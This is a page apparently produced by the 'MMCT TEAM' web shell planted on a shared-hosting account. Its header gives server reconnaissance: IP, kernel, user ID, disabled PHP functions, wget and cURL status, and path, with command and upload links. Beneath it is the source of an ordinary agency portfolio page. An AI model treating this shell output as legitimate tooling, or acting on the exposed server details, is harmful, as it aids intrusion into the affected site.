MMCT TEAM
Server IP : 2a02:4780:2b:1556:0:9c6:43c4:d  /  Your IP : 216.73.217.162
Web Server : LiteSpeed
System : Linux us-bos-web1456.main-hosting.eu 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
User : u163988420 ( 163988420)
PHP Version : 8.5.4
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail, proc_open
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u163988420/public_html/AACSITE/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u163988420/public_html/AACSITE/portfolio.php
<?php include 'includes/header.php'; ?>

<!-- ====== PAGE HERO ====== -->
<section class="page-hero">
    <div class="overlay"></div>
    <div class="hero-grid-lines">
        <?php for ($i = 0; $i < 8; $i++): ?><div class="grid-line"></div><?php endfor; ?>
    </div>
    <div class="container text-center" style="position:relative;z-index:2">
        <div class="hero-eyebrow"><span class="badge-dot"></span><span>OUR WORK</span></div>
        <h1>Our <span>Portfolio</span></h1>
        <p>Explore our diverse range of projects and see how we've helped businesses achieve their goals.</p>
        <div class="hero-breadcrumb">
            <a href="index.php">Home</a>
            <i class="bi bi-chevron-right"></i>
            <span>Portfolio</span>
        </div>
    </div>
</section>

<style>
    /* ====== SHARED PAGE HERO ====== */
    .page-hero {
        position: relative;
        padding: 130px 0 100px;
        background: linear-gradient(135deg, #020509 0%, #041020 60%, #060d14 100%);
        overflow: hidden;
    }

    .page-hero .overlay {
        position: absolute;
        inset: 0;
        background: radial-gradient(ellipse at 60% 50%, rgba(0, 212, 255, 0.05) 0%, transparent 70%);
    }

    .hero-grid-lines {
        position: absolute;
        inset: 0;
        display: flex;
        justify-content: space-around;
        pointer-events: none;
    }

    .grid-line {
        width: 1px;
        height: 100%;
        background: linear-gradient(to bottom, transparent, rgba(0, 212, 255, 0.08), transparent);
        animation: grid-pulse 4s ease-in-out infinite;
    }

    .grid-line:nth-child(odd) {
        animation-delay: -2s;
    }

    @keyframes grid-pulse {

        0%,
        100% {
            opacity: .3
        }

        50% {
            opacity: 1
        }
    }

    .hero-eyebrow {
        display: inline-flex;
        align-items: center;
        gap: 8px;
        background: rgba(0, 212, 255, 0.06);
        border: 1px solid rgba(0, 212, 255, 0.25);
        border-radius: 30px;
        padding: 6px 18px;
        margin-bottom: 20px;
        font-family: 'Orbitron', monospace;
        font-size: 10px;
        letter-spacing: 3px;
        color: #00d4ff;
    }

    .badge-dot {
        width: 6px;
        height: 6px;
        background: #00d4ff;
        border-radius: 50%;
        box-shadow: 0 0 8px #00d4ff;
        animation: pulse-dot 2s infinite;
    }

    @keyframes pulse-dot {

        0%,
        100% {
            opacity: 1;
            transform: scale(1)
        }

        50% {
            opacity: .5;
            transform: scale(.8)
        }
    }

    .page-hero h1 {
        font-family: 'Orbitron', monospace;
        font-size: clamp(28px, 5vw, 50px);
        font-weight: 800;
        color: #e8f4ff;
        margin-bottom: 14px;
        letter-spacing: 1px;
    }

    .page-hero h1 span {
        color: #00d4ff;
    }

    .page-hero p {
        color: #5a8a9f;
        font-size: 16px;
        max-width: 550px;
        margin: 0 auto 24px;
        line-height: 1.7;
    }

    .hero-breadcrumb {
        display: inline-flex;
        align-items: center;
        gap: 8px;
        font-size: 12px;
        color: #4a7a9b;
        font-family: 'Orbitron', monospace;
        letter-spacing: 1px;
    }

    .hero-breadcrumb a {
        color: #00d4ff;
        text-decoration: none;
    }

    .hero-breadcrumb i {
        font-size: 10px;
    }

    /* ====== SHARED BUTTONS ====== */
    .btn-primary-tech {
        display: inline-flex;
        align-items: center;
        gap: 10px;
        background: linear-gradient(135deg, #00d4ff, #0099cc);
        color: #020509;
        padding: 14px 30px;
        border-radius: 8px;
        font-weight: 700;
        font-size: 13px;
        font-family: 'Orbitron', monospace;
        letter-spacing: 1px;
        text-decoration: none;
        transition: all 0.3s;
        box-shadow: 0 0 25px rgba(0, 212, 255, 0.35);
    }

    .btn-primary-tech:hover {
        transform: translateY(-3px);
        box-shadow: 0 0 40px rgba(0, 212, 255, 0.6);
        color: #020509;
    }

    .btn-ghost-tech {
        display: inline-flex;
        align-items: center;
        gap: 10px;
        background: transparent;
        color: #e8f4ff;
        padding: 13px 28px;
        border-radius: 8px;
        font-weight: 600;
        font-size: 13px;
        text-decoration: none;
        border: 1px solid rgba(0, 212, 255, 0.3);
        transition: all 0.3s;
        font-family: 'Orbitron', monospace;
    }

    .btn-ghost-tech:hover {
        background: rgba(0, 212, 255, 0.08);
        border-color: #00d4ff;
        color: #00d4ff;
        transform: translateY(-2px);
    }

    /* ====== SHARED CTA ====== */
    .cta-section-dark {
        position: relative;
    }

    .cta-box-dark {
        background: rgba(6, 18, 32, 0.8);
        border: 1px solid rgba(0, 212, 255, 0.2);
        border-radius: 16px;
        padding: 70px 40px;
        position: relative;
        overflow: hidden;
        backdrop-filter: blur(12px);
    }

    .cta-box-dark::before {
        content: "";
        position: absolute;
        inset: 0;
        background: radial-gradient(ellipse at center, rgba(0, 212, 255, 0.04), transparent 70%);
        pointer-events: none;
    }

    .cta-corner {
        position: absolute;
        width: 20px;
        height: 20px;
        border-color: rgba(0, 212, 255, 0.5);
        border-style: solid;
    }

    .cta-tl {
        top: 12px;
        left: 12px;
        border-width: 2px 0 0 2px
    }

    .cta-tr {
        top: 12px;
        right: 12px;
        border-width: 2px 2px 0 0
    }

    .cta-bl {
        bottom: 12px;
        left: 12px;
        border-width: 0 0 2px 2px
    }

    .cta-br {
        bottom: 12px;
        right: 12px;
        border-width: 0 2px 2px 0
    }

    .cta-badge {
        display: inline-flex;
        align-items: center;
        gap: 8px;
        background: rgba(0, 212, 255, 0.06);
        border: 1px solid rgba(0, 212, 255, 0.25);
        border-radius: 30px;
        padding: 6px 16px;
        font-size: 10px;
        letter-spacing: 3px;
        color: #00d4ff;
        font-family: 'Orbitron', monospace;
    }

    .cta-box-dark h2 {
        font-family: 'Orbitron', monospace;
        font-size: clamp(22px, 4vw, 40px);
        font-weight: 700;
        color: #e8f4ff;
        margin-bottom: 16px;
        position: relative;
    }

    .cta-box-dark p {
        font-size: 15px;
        color: #5a8a9f;
        max-width: 550px;
        margin: 0 auto 36px;
        line-height: 1.7;
        position: relative;
    }

    .cta-buttons-dark {
        display: flex;
        gap: 16px;
        justify-content: center;
        flex-wrap: wrap;
        position: relative;
    }

    @media(max-width:768px) {
        .cta-box-dark {
            padding: 50px 24px;
        }
    }
</style>


<!-- ====== PORTFOLIO SECTION ====== -->
<section class="portfolio-page-section py-5">
    <div class="container">

        <div class="text-center mb-5">
            <h2 class="section-title">Explore <span>Projects</span></h2>
            <p class="section-subtitle">Explore some of our recent work and successful projects across multiple industries.</p>
        </div>

        <!-- Filter -->
        <div class="portfolio-filter-dark text-center mb-5">
            <button class="pfd-btn active" data-filter="all">
                <i class="bi bi-grid-3x3-gap"></i> All Projects
            </button>
            <button class="pfd-btn" data-filter="web">
                <i class="bi bi-globe"></i> Web
            </button>
            <button class="pfd-btn" data-filter="app">
                <i class="bi bi-phone"></i> App
            </button>
            <button class="pfd-btn" data-filter="design">
                <i class="bi bi-palette"></i> Design
            </button>
        </div>

        <!-- Grid -->
        <div class="row portfolio-grid">

            <?php
            $projects = [
                ["cat" => "web", "title" => "Business Website", "type" => "Web Development", "img" => "assets/images/cta-bg.png", "tech" => ["PHP", "Bootstrap", "MySQL"], "year" => "2024"],
                ["cat" => "app", "title" => "Mobile App", "type" => "App Development", "img" => "assets/images/cta-bg.png", "tech" => ["Flutter", "Firebase"], "year" => "2024"],
                ["cat" => "design", "title" => "Brand Design", "type" => "Graphic Design", "img" => "assets/images/cta-bg.png", "tech" => ["Illustrator", "Photoshop"], "year" => "2024"],
                ["cat" => "web", "title" => "E-commerce Store", "type" => "Web Development", "img" => "assets/images/cta-bg.png", "tech" => ["WooCommerce", "PHP"], "year" => "2023"],
                ["cat" => "app", "title" => "Task Manager App", "type" => "App Development", "img" => "assets/images/cta-bg.png", "tech" => ["React Native", "Node.js"], "year" => "2023"],
                ["cat" => "design", "title" => "UI/UX Dashboard", "type" => "UI Design", "img" => "assets/images/cta-bg.png", "tech" => ["Figma", "Adobe XD"], "year" => "2023"],
            ];
            foreach ($projects as $i => $project): ?>
                <div class="col-lg-4 col-md-6 mb-4 portfolio-item <?php echo $project['cat']; ?>" style="--i:<?php echo $i; ?>">
                    <div class="pcard-dark">
                        <!-- Image -->
                        <div class="pcard-img">
                            <img src="<?php echo $project['img']; ?>" alt="<?php echo $project['title']; ?>">
                            <div class="pcard-scan"></div>
                            <!-- Overlay -->
                            <div class="pcard-overlay">
                                <div class="pcard-actions">
                                    <a href="#" class="pcard-btn" title="Preview"><i class="bi bi-eye"></i></a>
                                    <a href="#" class="pcard-btn" title="Live"><i class="bi bi-box-arrow-up-right"></i></a>
                                </div>
                            </div>
                        </div>
                        <!-- Info -->
                        <div class="pcard-info">
                            <div class="pcard-meta">
                                <span class="pcard-type"><?php echo $project['type']; ?></span>
                                <span class="pcard-year"><?php echo $project['year']; ?></span>
                            </div>
                            <h5><?php echo $project['title']; ?></h5>
                            <div class="pcard-tech">
                                <?php foreach ($project['tech'] as $t): ?>
                                    <span><?php echo $t; ?></span>
                                <?php endforeach; ?>
                            </div>
                        </div>
                        <div class="pcard-border-glow"></div>
                    </div>
                </div>
            <?php endforeach; ?>

        </div>

    </div>
</section>

<style>
    .portfolio-page-section {
        position: relative;
    }

    /* Filter */
    .portfolio-filter-dark {
        display: flex;
        justify-content: center;
        flex-wrap: wrap;
        gap: 10px;
    }

    .pfd-btn {
        display: inline-flex;
        align-items: center;
        gap: 7px;
        border: 1px solid rgba(0, 212, 255, 0.18);
        background: transparent;
        color: #5a8a9f;
        padding: 9px 22px;
        border-radius: 8px;
        font-size: 11px;
        font-family: 'Orbitron', monospace;
        letter-spacing: 1.5px;
        cursor: pointer;
        transition: all 0.3s;
    }

    .pfd-btn.active,
    .pfd-btn:hover {
        background: rgba(0, 212, 255, 0.1);
        border-color: #00d4ff;
        color: #00d4ff;
        box-shadow: 0 0 15px rgba(0, 212, 255, 0.15);
    }

    /* Card */
    .pcard-dark {
        border-radius: 12px;
        overflow: hidden;
        border: 1px solid rgba(0, 212, 255, 0.1);
        background: rgba(6, 18, 32, 0.7);
        backdrop-filter: blur(10px);
        transition: all 0.4s cubic-bezier(0.4, 0, 0.2, 1);
        position: relative;
        animation: card-in 0.6s ease calc(var(--i)*0.08s) both;
    }

    @keyframes card-in {
        from {
            opacity: 0;
            transform: translateY(30px)
        }

        to {
            opacity: 1;
            transform: translateY(0)
        }
    }

    .pcard-dark:hover {
        transform: translateY(-10px);
        border-color: rgba(0, 212, 255, 0.4);
        box-shadow: 0 25px 60px rgba(0, 0, 0, 0.5), 0 0 30px rgba(0, 212, 255, 0.1);
    }

    /* Border glow */
    .pcard-border-glow {
        position: absolute;
        inset: 0;
        border-radius: 12px;
        opacity: 0;
        transition: 0.4s;
        pointer-events: none;
        box-shadow: inset 0 0 25px rgba(0, 212, 255, 0.05);
    }

    .pcard-dark:hover .pcard-border-glow {
        opacity: 1;
    }

    /* Image */
    .pcard-img {
        position: relative;
        overflow: hidden;
        height: 220px;
    }

    .pcard-img img {
        width: 100%;
        height: 100%;
        object-fit: cover;
        filter: brightness(0.65) saturate(0.7);
        transition: 0.5s;
    }

    .pcard-dark:hover .pcard-img img {
        transform: scale(1.08);
        filter: brightness(0.45) saturate(0.5);
    }

    /* Scan line */
    .pcard-scan {
        position: absolute;
        top: -5%;
        left: 0;
        width: 100%;
        height: 2px;
        background: linear-gradient(90deg, transparent, rgba(0, 212, 255, 0.5), transparent);
        opacity: 0;
        transition: 0.3s;
    }

    .pcard-dark:hover .pcard-scan {
        animation: img-scan 3s linear infinite;
        opacity: 1;
    }

    @keyframes img-scan {
        0% {
            top: -5%;
            opacity: 1
        }

        90% {
            top: 105%;
            opacity: 1
        }

        91%,
        100% {
            top: -5%;
            opacity: 0
        }
    }

    /* Overlay */
    .pcard-overlay {
        position: absolute;
        inset: 0;
        display: flex;
        align-items: center;
        justify-content: center;
        opacity: 0;
        transition: 0.4s;
    }

    .pcard-dark:hover .pcard-overlay {
        opacity: 1;
    }

    .pcard-actions {
        display: flex;
        gap: 12px;
    }

    .pcard-btn {
        width: 44px;
        height: 44px;
        background: rgba(0, 212, 255, 0.12);
        border: 1px solid rgba(0, 212, 255, 0.4);
        border-radius: 10px;
        display: flex;
        align-items: center;
        justify-content: center;
        color: #00d4ff;
        font-size: 16px;
        text-decoration: none;
        transition: 0.3s;
        backdrop-filter: blur(5px);
    }

    .pcard-btn:hover {
        background: rgba(0, 212, 255, 0.25);
        color: #fff;
        transform: scale(1.1);
    }

    /* Info */
    .pcard-info {
        padding: 20px;
    }

    .pcard-meta {
        display: flex;
        justify-content: space-between;
        align-items: center;
        margin-bottom: 8px;
    }

    .pcard-type {
        font-family: 'Orbitron', monospace;
        font-size: 9px;
        letter-spacing: 2px;
        color: #00d4ff;
    }

    .pcard-year {
        font-family: 'Orbitron', monospace;
        font-size: 9px;
        letter-spacing: 1px;
        color: rgba(0, 212, 255, 0.35);
    }

    .pcard-info h5 {
        font-family: 'Orbitron', monospace;
        font-size: 13px;
        font-weight: 600;
        color: #c8e8ff;
        margin-bottom: 12px;
    }

    .pcard-tech {
        display: flex;
        flex-wrap: wrap;
        gap: 6px;
    }

    .pcard-tech span {
        font-size: 10px;
        color: #4a7a9b;
        background: rgba(0, 212, 255, 0.05);
        border: 1px solid rgba(0, 212, 255, 0.12);
        padding: 3px 10px;
        border-radius: 4px;
        font-family: 'Orbitron', monospace;
        letter-spacing: 0.5px;
    }
</style>

<script>
    document.querySelectorAll('.pfd-btn').forEach(btn => {
        btn.addEventListener('click', function() {
            document.querySelectorAll('.pfd-btn').forEach(b => b.classList.remove('active'));
            this.classList.add('active');
            const filter = this.getAttribute('data-filter');
            document.querySelectorAll('.portfolio-item').forEach(item => {
                item.style.display = (filter === 'all' || item.classList.contains(filter)) ? 'block' : 'none';
            });
        });
    });
</script>


<!-- ====== CTA ====== -->
<section class="cta-section-dark my-5 py-5">
    <div class="container">
        <div class="cta-box-dark text-center">
            <div class="cta-corner cta-tl"></div>
            <div class="cta-corner cta-tr"></div>
            <div class="cta-corner cta-bl"></div>
            <div class="cta-corner cta-br"></div>
            <div class="cta-badge mb-4"><span class="badge-dot"></span><span>YOUR PROJECT NEXT</span></div>
            <h2>Like What You See?</h2>
            <p>Let's create something amazing for your business. Our team is ready to turn your vision into a successful project.</p>
            <div class="cta-buttons-dark">
                <a href="contact.php" class="btn-primary-tech"><span>Get Free Consultation</span><i class="bi bi-arrow-right"></i></a>
                <a href="tel:9999999999" class="btn-ghost-tech"><i class="bi bi-telephone me-2"></i><span>Call Now</span></a>
            </div>
        </div>
    </div>
</section>

<?php include 'includes/footer.php'; ?>

MMCT - 2023